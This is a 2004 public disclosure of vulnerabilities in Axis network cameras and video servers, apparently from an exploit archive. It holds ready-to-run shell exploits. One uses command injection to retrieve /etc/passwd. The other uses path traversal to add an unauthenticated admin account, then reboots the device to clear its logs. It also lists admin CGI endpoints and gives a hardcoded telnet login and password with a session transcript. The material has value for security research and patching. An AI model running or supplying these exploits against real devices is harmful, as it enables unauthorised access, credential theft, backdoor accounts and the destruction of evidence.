Axis versions 2100, 2110, 2120, 2420, and 2130 Network Camera along with the 2400 and 2401 Video Servers are susceptible to passwd file retrieval vulnerabilities, unauthenticated admin user additions, and hardcoded login/password flaws.
d1d78c221379418bea65762e89060fc19d494c26f885bd544cfcb10625efd868
/* Public disclosure due lack of responce from Axis Communications */
I have found a couple of bugs in Axis Network Camera/Video Servers.
(I have all Axis stuff in one e-mail, instead of multiple, lazy me.. ;)
Vulnerable: Axis 2100/2110/2120/2420/2130 Network Camera, 2400/2401 Video Server.
(There may be more devices vulnerable)
Included files (some is simple shell scripts):
axis-passwd.sh ........... Get /etc/passwd as 'anonymous viewer' v2.34/2.40
axis-wh00t.sh ............ Add admin account as 'anonymous viewer' v2.12-2.40 (whoops!)
axis-cgi.txt ............. [bonus] Not so mutch bugs here, but nice to know ;)
axis-storpoint-cd-E100.txt [bonus] Hardcoded l/p in Storepoint CD servers
Check each section for more details.
Quote of the day: Never say "whoops!", always say "Ah, Interesting!"
Vendor,
Contacted:
>To: security@axis.com
>Date: Mon, 16 Aug 2004 22:48:38 +0200 (CEST)
Status: No responce what so ever.
Fix/Workaround: None, v2.40 is the latest known version.
Url: http://www.axis.com/
Greets to people in #hack.se @EFnet.
Have a nice day
/bashis
----[ axis-passwd.sh ]----
#!/bin/sh
#
# Get /etc/passwd from:
# Axis 2100/2110/2120/2420 Network Camera 2.34/2.40
# AXIS 2130 PTZ Network Camera
# AXIS 2400/2401 Video Server
# (There may be more devices vulnerable)
#
# Problem:
# PARAMETER=`echo $QUERY_STRING | sed 's/\(^.*\)=.*$/\1/'`
# in 'virtualinput.cgi'
#
# Bug found and code by bashis <mcw+at+wcd.se> 2004-08
# Greets: #hack.se @EFnet
#
# FAQ:
# Q: Where is the cam's?
# A: Google is your friend.
#
if [ ${#*} -ne 2 ]
then
printf "\nUsage: %s <ip> <port>\n\n" $0
exit 1
fi
#
printf "+++ Sending request to %s:%d\n+++ Received:\n" $1 $2
printf "GET /axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60 HTTP/1.1\n\n" | nc $1 $2
printf "+++ Yeah, right.. for you maybe, but not for me ;->\n\n+++ Get the passwd file now\n+++ Received:\n"
printf "GET /local/passwd HTTP/1.0\n\n" | nc $1 $2
printf "\n+++ Thats it.. Thanks for using Axis Airlines!\n"
----[ axis-wh00t.sh ]----
#!/bin/sh
#
# Add admin account with l/p: wh00t/wh00t
# Axis 2100/2110/2120/2420 Network Camera 2.12-2.40
# AXIS 2130 PTZ Network Camera
# AXIS 2400/2401 Video Server
# (There may be more devices vulnerable)
#
# Problem:
# POST action follows "/../"
#
# Bug found and code by bashis <mcw+at+wcd.se> 2004-08
# Greets: #hack.se @EFnet
#
# 2.12 seems to very buggy version, it add wh00t account,
# but editcgi.cgi seems not to work..
#
# Yes, you can use 'editcgi.cgi' to edit /etc/passwd
# and change/add what you want, or browse around in filesystem.
#
# FAQ:
# Q: Where is the cam's?
# A: Google is your friend.
#
if [ ${#*} -ne 2 ]
then
printf "\nUsage: %s <ip> <port>\n\n" $0
exit 1
fi
#
printf "+++ Sending request to %s:%d\n" $1 $2
printf "+++ If all went well, you should see the password file soon...\n+++ Received:\n\n"
printf "POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0\nContent-Length: 250\nPragma: no-cache\n\nconf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables\n" | nc $1 $2 > /dev/null
# Note.......^^^^^^^^^^^^^^^^^^^^^^
#
printf "GET /admin-bin/editcgi.cgi?file=/etc/passwd HTTP/1.0\nHost: 127.0.0.1\nAuthorization: Basic d2gwMHQ6d2gwMHQ=\n\n" | nc $1 $2
# it's good to clear logfile, so let us reboot the device now
printf "GET /cgi-bin/admin/restart.cgi HTTP/1.0\nAuthorization: Basic d2gwMHQ6d2gwMHQ=\n\n" | nc $1 $2 > /dev/null
printf "\n\n+++ You can edit file(s) and browse around filesystem with:\nhttp://$1/admin-bin/editcgi.cgi?file=\n"
printf "+++ Login with wh00t/wh00t (yes, you can edit /etc/passwd)\n"
printf "\n+++ Thats it.. Thanks for using Axis Airlines!\n"
----[ axis-cgi.txt ]----
# Well, not so mutch bugs here, but nice to know.. ;)
#
# From version: 2.12 and newer.
# (All dosn't work with 2.12)
#
List all availible parameters.
> http://<device>/cgi-bin/admin/getparam.cgi
or
> http://<device>/cgi-bin/admin/getparam.cgi?root.Layout.OwnTitle
Set one parameter.
> http://<device>/cgi-bin/admin/setparam.cgi?root.Layout.OwnTitle=Lame%20stuff
# Note, Axis is changing 'cgi-bin' to 'axis-cgi'
#
/cgi-bin/admin/systemlog.cgi (show syslog)
/cgi-bin/admin/serverreport.cgi (use[full|less] reports)
/cgi-bin/admin/restart.cgi (restart device, also good to clear syslog)
/cgi-bin/admin/paramlist.cgi (get some config)
/cgi-bin/admin/getparam.cgi (shown above)
/cgi-bin/admin/setparam.cgi (shown above)
/cgi-bin/admin/factorydefault.cgi (hrmm.. ;)
/admin-bin/editcgi.cgi?file= (browse filesystem, edit any file)
----[ axis-storpoint-cd-E100.txt ]----
# Yeah, old product.. old version.. but.. hardcoded l/p, uhm?
# l: copyright p: mammalambalouie
#
# Note, this hardcoded l/p exist in other products and newer versions
# of software as well, but i have not done so mutch research about this.
$ telnet xxx.xxx.xxx.xxx
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000
AXIS StorPoint CD E100 network login: copyright
Password: mammalambalouie
AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000
Root>
Root> q
Goodbye!
Connection closed by foreign host.
$
----